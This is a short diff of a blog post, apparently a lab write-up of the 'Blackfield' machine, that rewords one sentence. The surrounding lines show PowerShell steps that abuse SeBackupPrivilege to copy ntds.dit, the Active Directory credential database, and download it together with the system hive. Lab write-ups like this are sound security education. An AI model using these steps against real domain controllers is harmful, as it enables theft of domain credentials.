Bunnys666/Bunnys666.github.io/_posts/2022-04-21-blackfield.md

 Import-Module .\SeBackupPrivilegeUtils.dll
 ```

-after the backup process is complete we need to copy ntds.dit from Z drive into C:\temp\, and download `ntds.dit` and `system` into our host with following command:
+after the backup process is complete we need to copy ntds.dit from Z drive into C:\temp\ folder, and download `ntds.dit` and `system` into our host with following command:

 ```powershell
 Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\temp\ntds.dit -Overwrite